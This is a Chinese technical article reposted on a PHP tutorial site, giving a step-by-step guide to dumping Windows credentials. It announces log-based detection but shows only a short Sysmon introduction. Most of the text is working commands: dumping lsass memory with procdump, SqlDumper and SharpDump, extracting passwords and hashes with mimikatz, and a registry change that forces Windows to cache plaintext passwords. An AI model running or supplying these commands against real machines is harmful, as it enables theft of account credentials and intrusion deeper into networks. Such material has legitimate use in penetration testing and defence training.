0

0

windows凭证转储(一)

爱谁谁

爱谁谁

发布时间:2025-08-29 09:07:19

|

384人浏览过

|

来源于php中文网

原创

声明:本公众号的大部分文章由团队核心成员和知识星球成员撰写,少数文章经原作者授权或其他公众号白名单转载。未经授权,禁止转载。如需转载,请联系我们获取白名单权限!

请勿利用文章内的技术进行非法测试,如因此产生的不良后果与文章作者及本公众号无关!!!

START

0x01 前言

本文主要介绍在Windows系统环境下进行凭证转储的多种方法,以及通过日志检查是否遭受凭证转储的步骤。

0x02 相关概念

(1) 凭证转储:指从操作系统和软件中提取登录账号密码信息的过程,获取的凭证可用于横向移动、访问受限信息、远程桌面连接等。(2) lsass memory: 包括已登录用户的明文密码、Kerberos票证、Kerberos加密密钥、智能卡/令牌PIN码、lm/ntlm哈希、dpapi域备份密钥、域信任身份验证信息、缓存的dpapi主密钥、缓存的syskey(需要解密sam/lsa机密/缓存的凭据/ntds.dit)、凭证管理器中的明文密码等。这些数据由LsaProtectMemory保护。(3) SAM (Security Accounts Manager):SAM是一个数据库文件,存储主机的本地账户,通常可以通过“net user”命令找到这些账户。枚举SAM数据库需要系统级权限。(4) 常用工具:Mimikatz、Invoke-Mimikatz、procdump、sqldump、sharpdump

0x03 Sysmon 简介和使用

System Monitor (Sysmon)是一个Windows系统服务和设备驱动程序,用于监控系统活动并将其记录到Windows事件日志中。它提供了关于进程创建、网络连接和文件创建时间变更的详细信息。通过收集并分析Sysmon生成的事件文件,可以识别恶意或异常活动,了解入侵者和恶意软件在网络中的操作。

windows凭证转储(一)0x04 获取系统口令

1) 使用procdump和mimikatz获取系统凭证的详细步骤:

步骤一:procdump是微软的进程分析工具,用于对目标主机系统进程进行打包。工具下载地址:https://www.php.cn/link/0c9aecd2692cfe28067bb0eba9ae409a

考拉新媒体导航
考拉新媒体导航

考拉新媒体导航——新媒体人的专属门户网站

下载
procdump.exe -accepteula -ma lsass.exe lsass.dmp

步骤二:将生成的lsass.dmp文件传回本地,并使用mimikatz进行解包。mimikatz是一个由法国开发者编写的轻量级调试器,可以直接从lsass.exe中提取Windows活动状态下的账号明文密码:

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

注意:在Windows 10和Windows Server 2016及以上版本中,默认情况下内存缓存中不保存明文密码,密码字段会显示为null。此时可以通过以下方法解决,但需要用户重新登录后才能成功提取。解决方法:修改注册表,等待用户再次登录,然后重复步骤1和2即可获取明文密码:

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1

windows凭证转储(一)0x05 常见进程转储方式

(1) 使用procdump进行转储

Procdump是Sysinternals团队开发的一个轻量级命令行工具,主要用于监控应用程序的CPU异常活动,并在异常时生成crash dump文件,供研发人员和管理员诊断问题原因。可以利用此工具获取在线进程数据。

procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsaaa.dmp" "sekurlsa::logonPasswords full" "exit"

windows凭证转储(一)(2) 使用sqldump进行转储

SqlDumper.exe默认位于C:\Program Files\Microsoft SQL Server\number\Shared,number代表SQL Server的版本。如果目标计算机未安装MSSQL,可以手动上传一个sqldumper.exe可执行文件。

tasklist /svc |findstr lsass.exe
Sqldumper.exe 进程ID 0 0x01100
mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" "exit"

(3) 使用SharpDump进行转储

下载地址:https://www.php.cn/link/e52265108325dab81ab318b51c5c83a1

%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "D:\工具\mimikatz\SharpDump-master\SharpDump.sln" /property:Configuration=Debug /t:build /p:VisualStudioVersion=14.0

windows凭证转储(一)进入c:\windows\temp\,提取debug.bin文件,将其后缀从bin改为zip后解压:

mimikatz.exe "sekurlsa::minidump debug908" "sekurlsa::logonPasswords full" "exit"

相关文章

Windows激活工具
Windows激活工具

Windows激活工具是正版认证的激活工具,永久激活,一键解决windows许可证即将过期。可激活win7系统、win8.1系统、win10系统、win11系统。下载后先看完视频激活教程,再进行操作,100%激活成功。

下载

本站声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn

热门AI工具

更多
DeepSeek
DeepSeek

幻方量化公司旗下的开源大模型平台

豆包大模型
豆包大模型

字节跳动自主研发的一系列大型语言模型

通义千问
通义千问

阿里巴巴推出的全能AI助手

腾讯元宝
腾讯元宝

腾讯混元平台推出的AI助手

文心一言
文心一言

文心一言是百度开发的AI聊天机器人,通过对话可以生成各种形式的内容。

讯飞写作
讯飞写作

基于讯飞星火大模型的AI写作工具,可以快速生成新闻稿件、品宣文案、工作总结、心得体会等各种文文稿

即梦AI
即梦AI

一站式AI创作平台,免费AI图片和视频生成。

ChatGPT
ChatGPT

最最强大的AI聊天机器人程序,ChatGPT不单是聊天机器人,还能进行撰写邮件、视频脚本、文案、翻译、代码等任务。

相关专题

更多
数据分析工具有哪些
数据分析工具有哪些

数据分析工具有Excel、SQL、Python、R、Tableau、Power BI、SAS、SPSS和MATLAB等。详细介绍:1、Excel,具有强大的计算和数据处理功能;2、SQL,可以进行数据查询、过滤、排序、聚合等操作;3、Python,拥有丰富的数据分析库;4、R,拥有丰富的统计分析库和图形库;5、Tableau,提供了直观易用的用户界面等等。

728

2023.10.12

SQL中distinct的用法
SQL中distinct的用法

SQL中distinct的语法是“SELECT DISTINCT column1, column2,...,FROM table_name;”。本专题为大家提供相关的文章、下载、课程内容,供大家免费下载体验。

328

2023.10.27

SQL中months_between使用方法
SQL中months_between使用方法

在SQL中,MONTHS_BETWEEN 是一个常见的函数,用于计算两个日期之间的月份差。想了解更多SQL的相关内容,可以阅读本专题下面的文章。

350

2024.02.23

SQL出现5120错误解决方法
SQL出现5120错误解决方法

SQL Server错误5120是由于没有足够的权限来访问或操作指定的数据库或文件引起的。想了解更多sql错误的相关内容,可以阅读本专题下面的文章。

1263

2024.03.06

sql procedure语法错误解决方法
sql procedure语法错误解决方法

sql procedure语法错误解决办法:1、仔细检查错误消息;2、检查语法规则;3、检查括号和引号;4、检查变量和参数;5、检查关键字和函数;6、逐步调试;7、参考文档和示例。想了解更多语法错误的相关内容,可以阅读本专题下面的文章。

360

2024.03.06

oracle数据库运行sql方法
oracle数据库运行sql方法

运行sql步骤包括:打开sql plus工具并连接到数据库。在提示符下输入sql语句。按enter键运行该语句。查看结果,错误消息或退出sql plus。想了解更多oracle数据库的相关内容,可以阅读本专题下面的文章。

841

2024.04.07

sql中where的含义
sql中where的含义

sql中where子句用于从表中过滤数据,它基于指定条件选择特定的行。想了解更多where的相关内容,可以阅读本专题下面的文章。

581

2024.04.29

sql中删除表的语句是什么
sql中删除表的语句是什么

sql中用于删除表的语句是drop table。语法为drop table table_name;该语句将永久删除指定表的表和数据。想了解更多sql的相关内容,可以阅读本专题下面的文章。

423

2024.04.29

java入门学习合集
java入门学习合集

本专题整合了java入门学习指南、初学者项目实战、入门到精通等等内容,阅读专题下面的文章了解更多详细学习方法。

1

2026.01.29

热门下载

更多
网站特效
/
网站源码
/
网站素材
/
前端模板

精品课程

更多
相关推荐
/
热门推荐
/
最新课程
MongoDB 教程
MongoDB 教程

共17课时 | 2.4万人学习

XML教程
XML教程

共142课时 | 6万人学习

php-src源码分析探索
php-src源码分析探索

共6课时 | 0.5万人学习

关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送

Copyright 2014-2026 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号